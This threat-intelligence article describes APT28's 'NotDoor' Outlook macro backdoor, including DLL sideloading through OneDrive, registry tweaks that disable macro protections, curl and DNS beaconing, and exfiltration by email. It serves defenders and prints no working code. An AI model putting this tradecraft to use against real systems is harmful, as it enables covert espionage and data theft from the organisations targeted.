Russian State-Backed APT Leverages DLL Sideloading to Deliver Outlook-Based Backdoor

APT28 (aka. Fancy Bear, Forest Blizzard), a Russian state-aligned threat group, has been linked to a newly identified backdoor named “NotDoor,” discovered by Lab52's intelligence team at S2 Grupo. The analysis provided by S2 Grupo reports, "The artefact, dubbed NotDoor due to the use of the word ‘Nothing’ within the code, is a VBA macro for Outlook designed to monitor incoming emails for a specific trigger word. When such an email is detected, it enables an attacker to exfiltrate data, upload files, and execute commands on the victim’s computer." Victims include organizations across NATO member countries, suggesting a likely cyber-espionage objective. While the report attributes the activity to APT28, the methodology behind the attribution remains unclear.

The delivery mechanism begins with a file named "testtemp.ini" staged in the "C:\ProgramData" directory. Execution is initiated by abusing DLL sideloading through Microsoft OneDrive.exe to load a malicious "SSPICLI.dll" file. This DLL is responsible for installing the Outlook macro, enabling persistence, and disabling multiple macro protections. Execution of "SSPICLI.dll" is carried out by "rundll32.exe" from an abnormal directory, followed by several PowerShell commands encoded in Base64. One command copies the malicious macro to the Outlook startup directory ("VbaProject.OTM"), another executes an "nslookup" query with the username appended to a domain using DNSHook, and a third sends a "curl" request with identifying information to a hardcoded Webhook[.]site address. These steps are likely used for beaconing and confirming successful deployment.

Additional process activity includes the use of "loaddll64.exe" and multiple spawned "conhost.exe" and "cmd.exe" instances. These are used to facilitate repeated execution of "rundll32.exe" with the malicious DLL payload, PowerShell scripts, and curl-based data exfiltration. Registry modifications are also made to ensure persistence: enabling the "LoadMacroProviderOnBoot" registry key and modifying Outlook security settings to allow macros without user prompts. Outlook dialog boxes are also suppressed to reduce user awareness. Once installed, the backdoor monitors for emails containing a configurable trigger string (e.g., “Daily Report”), after which it parses the message for commands and deletes the trigger email to erase evidence.

The macro-based backdoor supports several commands, including remote command execution, file upload, and file exfiltration via email attachments. It maintains a working directory under "%TEMP%\Temp" and sends data to attacker-controlled email addresses such as a.matti444@proton[.]me. Each exfiltrated file is encrypted using a custom encoding method involving modified Base64 strings, and filenames mimic typical business documents or media. This method allows APT28 to maintain long-term covert access and control while blending in with normal Outlook behavior. According to Lab52, the use of obfuscated macro code, registry-level persistence, and stealthy C2 communication indicates an enhancement in APT28’s tradecraft.